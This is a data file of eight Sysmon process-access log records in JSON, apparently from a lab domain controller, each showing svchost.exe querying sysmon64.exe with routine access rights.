{"EventTime":"2020-08-01 07:55:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3804,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:41.270\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:41.270","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3805,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:41.270\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:41.270","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3806,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:41.270\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:41.270","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3807,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:41.270\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:41.270","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3808,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:41.270\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:41.270","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3809,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:41.270\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:41.270","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3810,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:41.270\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:41.270","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3811,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:41.270\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:41.270","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
